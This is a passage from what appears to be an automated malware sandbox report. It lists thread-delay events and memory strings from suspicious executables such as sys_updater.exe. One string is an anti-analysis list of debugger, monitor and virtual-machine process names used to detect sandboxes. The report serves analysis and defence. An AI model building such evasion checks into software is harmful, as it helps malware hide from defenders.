                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59629Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59504Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59363Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59238Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59113Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 58988Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 58863Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 58738Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 599905Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59875Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59765Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59656Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59547Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59438Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59314Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59189Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59766Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59657Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59532Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59408Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59286Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59157Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 598000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59860Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59751Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59626Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141824907.00000234D4182000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2145592189.00000234D4182000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141802833.00000234D4182000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144121845.00000234D4182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flush
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                            Source: explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Avmtoolsd.dll
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141257028.00000234D4169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Swi
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionl
                            Source: sys_updater.exe, 00000018.00000003.2637078525.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2634313717.0000021E02FDD000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2637115071.0000021E02FDD000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2634273293.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot00
                            Source: sys_updater.exe, 0000001B.00000003.2716964943.00000159F1B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ime6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022Ex
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot{d
                            Source: sys_updater.exe, 00000018.00000003.2634383831.0000021E02FCC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2632091020.0000021E02FCC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2635858168.0000021E02FCC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2631811677.0000021E02FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Re
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor&Ef!
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                            Source: sys_updater.exe, 00000018.00000003.2686049114.0000021E03765000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2660087797.0000021E03567000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2759055860.00000159F38C7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2779479672.00000159F38C8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2915091882.0000020E49827000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2958783527.0000020E498F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor.
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition7w
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VMwareUsM1
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                            Source: sys_updater.exe.26.drBinary or memory string: hollows_hunter32procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exeKsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exeMoneta64.exefakenet.exeWireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exevmsrvc.exeVBoxTray.exeC:\Users\Hassp\.cargo\registry\src\index.crates.io-6f17d22bba15001f\antilysis-0.1.2\src\lib.rs>
                            Source: sys_updater.exe, 0000001B.00000003.2718630551.00000159F3479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rom cache9588WININET: Bytes from server9590WINHTTP: Bytes from cache9592WINHTTP: Bytes from server9594OTHER: Bytes from cache9596OTHER: Bytes from server9598Discovery: Attempted discoveries9600Local Cache: Cache complete file segments9602Local Cache: Cache partial file segments9604Hosted Cache: Client file segment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service#GR
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144347558.00000234D412A000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2142157004.00000234D412A000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144672790.00000234D410F000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2142269009.00000234D412A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 048
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionsys.D
                            Source: sys_updater.exe, 00000022.00000003.2888952827.00000237D326B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                            Source: sys_updater.exe, 0000001F.00000003.2836207562.0000020E47B63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
